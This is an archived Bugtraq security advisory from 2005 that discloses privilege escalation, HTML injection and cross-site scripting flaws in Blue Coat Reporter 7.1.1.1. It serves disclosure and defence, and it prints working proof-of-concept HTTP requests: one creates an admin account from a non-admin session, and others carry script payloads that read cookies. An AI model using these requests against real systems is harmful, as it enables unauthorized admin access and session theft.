Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Blue Coat Reporter multiple remote vulnerabilities

from [Oliver Karow] Network Security [Permanent Link]
Subject: Blue Coat Reporter multiple remote vulnerabilities
Date: Tue, 24 May 2005 10:29:13 +0200 (MEST) 
Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities
============================================================
 
Blue Coat Reporter
==================
 
"Blue Coat Reporter 7 provides identity-based reporting on Web
communications enabling enterprises to evaluate Web policies and manage
network resources more effectively. "
 
Product/Version
===============
 
Blue Coat Reporter 7.1.1.1
Running on Win32
 
Vulnerabilities
===============
 
a) Privilege escalation
 
    A user without administrative privileges is able to create a useraccount
with administrative privileges.
 
b) HTML-Code Injection
 
    Unauthenticated users can inject html-code into the application. The
code will be executed, if an authenticated user is viewing the affected
website.
 
c) Cross Site Scripting at login page
 
    Supplying scriptcode instead of a valid username at the login page will
end in a cross site scripting.
 
 
Exploiting
==========
 
a) Privlege escalation
 
1) Create a non-priv user (user: test, pass: test)
2) Log in with the non-administrative user account 
3) Sent the following request to create a user hurz with password hurz and
admin privileges.
 
 POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
 Referer:
http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
 Accept-Language: de
 Content-Type: application/x-www-form-urlencoded
 Proxy-Connection: Keep-Alive
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 Host: 192.168.142.133:8987
 Pragma: no-cache
 Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
 Content-Length: 170
 

submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new
 
b) HTML-Code Injection
 
POST
/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100


volatile.add_license=&volatile.license_to_add=<script>alert(document.cookie)</script>
 
 
c) Cross Site Scripting at login page
 
Supply the following username at the login page: 
"/><script>alert("BlueGoat")</script>
 
 
Vendor
======
 
Blue Coat was responding to my message very fast and in a very professional
way. Exemplary!
 
Homepage: http://www.bluecoat.com
Advisory:
http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
 
Discovered
==========
 
19.05.2005 by Oliver Karow
http://www.oliverkarow.de/research/bluecoat.htm

-- 
Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Blue Coat Reporter multiple remote vulnerabilities, Oliver Karow <=
Previous by Date:  CAID 32896 - Computer Associates Vet Antivirus engine heap overflow vulnerability, Williams, James K
Next by Date:  Gforge - viewFile.php security flaw, Filippo Spike Morelli
Previous by Thread:  CAID 32896 - Computer Associates Vet Antivirus engine heap overflow vulnerability, Williams, James K
Next by Thread:  Gforge - viewFile.php security flaw, Filippo Spike Morelli
Indexes:  [Date] [Thread] [Top] [All Lists]